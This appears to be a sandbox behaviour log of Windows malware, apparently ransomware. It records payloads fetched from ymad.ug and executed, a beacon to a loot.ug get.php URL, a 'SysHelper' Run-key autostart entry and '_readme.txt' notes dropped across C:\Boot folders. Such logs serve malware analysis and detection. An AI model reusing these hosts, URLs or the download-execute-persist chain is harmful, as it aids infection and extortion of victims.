Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
Inet Read Response size = 10240, size_out = 10240 True 1
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 10240 True 1
(the Inet Read Response / File Write pair above is recorded 16 times in succession at this point; the download of updatewin2.exe begins before this excerpt)
Inet Read Response size = 10240, size_out = 4608 True 1
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 4608 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, show_window = SW_SHOWNORMAL True 1
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin.exe True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin.exe True 1
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Inet Read Response size = 10240, size_out = 10240 True 1
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 10240 True 1
(the Inet Read Response / File Write pair above is recorded 27 times in succession: 27 × 10240 bytes)
Inet Read Response size = 10240, size_out = 7680 True 1
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 7680 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, show_window = SW_SHOWNORMAL True 1
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/3.exe True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/3.exe True 1
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/4.exe True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/4.exe True 1
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/5.exe True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/5.exe True 1
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Inet Read Response size = 10240, size_out = 10240 True 1
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 10240 True 1
(the Inet Read Response / File Write pair above is recorded 15 times in succession: 15 × 10240 bytes)
Inet Read Response size = 10240, size_out = 3072 True 1
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 3072 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, show_window = SW_SHOWNORMAL True 1
Thread 0x9cc
63 8
Category Operation Information Success Count
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Inet Read Response size = 1024, size_out = 103 True 1
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Thread 0x9e0
820 0
»
Category Operation Information Success Count Logfile
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1 Fn
Thread 0x9e4
270 0
Category Operation Information Success Count Logfile
System Sleep duration = 100000 milliseconds (100.000 seconds) True 1 Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1 Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1 Fn
File Create filename = C:\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1 Fn
File Write filename = C:\_readme.txt, size = 1110 True 1 Fn Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1 Fn
File Create filename = C:\Boot\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1 Fn
File Write filename = C:\Boot\_readme.txt, size = 1110 True 1 Fn Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1 Fn
File Create filename = C:\Boot\cs-CZ\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1 Fn
File Write filename = C:\Boot\cs-CZ\_readme.txt, size = 1110 True 1 Fn Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1 Fn
File Create filename = C:\Boot\da-DK\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1 Fn
File Write filename = C:\Boot\da-DK\_readme.txt, size = 1110 True 1 Fn Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1 Fn
File Create filename = C:\Boot\de-DE\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1 Fn
File Write filename = C:\Boot\de-DE\_readme.txt, size = 1110 True 1 Fn Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1 Fn
File Create filename = C:\Boot\el-GR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1 Fn
File Write filename = C:\Boot\el-GR\_readme.txt, size = 1110 True 1 Fn Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\en-US\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\en-US\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\es-ES\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\es-ES\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\fi-FI\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\fi-FI\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\Fonts\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\Fonts\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\fr-FR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\fr-FR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
